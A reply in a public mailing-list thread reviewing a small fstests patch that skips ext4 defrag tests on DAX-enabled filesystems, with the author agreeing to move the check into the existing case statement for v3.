> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>>    (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>>   common/defrag | 4 ++++
>>   1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>   
>>   _require_defrag()
>>   {
>> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
> 
> Shouldn't this be:
> 
> 	ext4)
> 		__scratch_uses_fsdax && _notrun "..."
> 		;;
> 
> in the case statement below?
> 
> --D

Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.

I'll send v3 with this change.

> 
>> +        _notrun "ext4 online defrag not supported with DAX"
>> +    fi
>> +
>>       case "$FSTYP" in
>>       xfs)
>>           # xfs_fsr does preallocates, require "falloc"
>> -- 
>> 2.45.1
>>

-- 
Regards,
Disha


^ permalink raw reply

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox